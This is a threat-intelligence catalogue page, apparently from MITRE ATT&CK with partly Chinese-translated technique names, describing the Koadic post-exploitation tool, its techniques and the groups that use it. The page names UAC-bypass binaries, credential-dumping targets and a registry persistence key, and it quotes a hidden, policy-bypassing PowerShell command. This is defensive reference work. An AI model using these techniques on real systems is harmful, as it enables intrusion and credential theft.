1. Home
  2. Software
  3. Koadic

Koadic

Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.[1][2][3]

ID: S0250
Type: TOOL
Platforms: Windows
Version: 2.0
Created: 17 October 2018
Last Modified: 27 September 2024
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows管理规范

Koadic can use WMI to execute commands.[1]
Enterprise T1005 从本地系统获取数据

Koadic can download files off the target system to send back to the server.[1][3]
Enterprise T1115 剪贴板数据

Koadic can retrieve the current content of the user clipboard.[1]
Enterprise T1573 .002 加密通道: Asymmetric Cryptography

Koadic can use SSL and TLS for communications.[1]
Enterprise T1547 .001 启动或登录自动启动执行: Registry Run Keys / Startup Folder

Koadic has added persistence to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Registry key.[3]
Enterprise T1059 .001 命令与脚本解释器: PowerShell

Koadic has used PowerShell to establish persistence.[3]

.003 命令与脚本解释器: Windows Command Shell

Koadic can open an interactive command-shell to perform command line functions on victim machines. Koadic performs most of its operations using Windows Script Host (Jscript) and to run arbitrary shellcode.[1][3]
.005 命令与脚本解释器: Visual Basic

Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .[1]
Enterprise T1071 .001 应用层协议: Web Protocols

Koadic has used HTTP for C2 communications.[3]
Enterprise T1003 .002 操作系统凭证转储: Security Account Manager

Koadic can gather hashed passwords by dumping SAM/SECURITY hive.[1]
.003 操作系统凭证转储: NTDS

Koadic can gather hashed passwords by gathering domain controller hashes from NTDS.[1]
Enterprise T1083 文件和目录发现

Koadic can obtain a list of directories.[3]
Enterprise T1548 .002 滥用权限提升控制机制: Bypass User Account Control

Koadic has 2 methods for elevating integrity. It can bypass UAC through eventvwr.exe and sdclt.exe.[1]
Enterprise T1218 .005 系统二进制代理执行: Mshta

Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.[1][3]

.010 系统二进制代理执行: Regsvr32

Koadic can use Regsvr32 to execute additional payloads.[1]
.011 系统二进制代理执行: Rundll32

Koadic can use Rundll32 to execute additional payloads.[1]
Enterprise T1082 系统信息发现

Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host.[3]
Enterprise T1033 系统所有者/用户发现

Koadic can identify logged in users across the domain and views user sessions.[1][3]
Enterprise T1569 .002 系统服务: Service Execution

Koadic can run a command on another machine using PsExec.[1]
Enterprise T1016 系统网络配置发现

Koadic can retrieve the contents of the IP routing table as well as information about the Windows domain.[1][3]
Enterprise T1135 网络共享发现

Koadic can scan local network for open SMB.[1]
Enterprise T1046 网络服务发现

Koadic can scan for open TCP ports on the target network.[1]
Enterprise T1105 输入工具传输

Koadic can download additional files and tools.[1][3]
Enterprise T1055 .001 进程注入: Dynamic-link Library Injection

Koadic can perform process injection by using a reflective DLL.[1]
Enterprise T1021 .001 远程服务: Remote Desktop Protocol

Koadic can enable remote desktop on the victim's machine.[1]
Enterprise T1564 .003 隐藏伪装: Hidden Window

Koadic has used the command Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden to hide its window.[3]
Enterprise T1053 .005 预定任务/作业: Scheduled Task

Koadic has used scheduled tasks to add persistence.[3]

Groups That Use This Software

ID Name References
G0007 APT28

[2]
G0140 LazyScripter

[3]
G0121 Sidewinder

[4]
G0069 MuddyWater

[5][6]

References

  1. Magius, J., et al. (2017, July 19). Koadic. Retrieved September 27, 2024.
  2. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
  3. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.
  1. Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.
  2. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
  3. Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.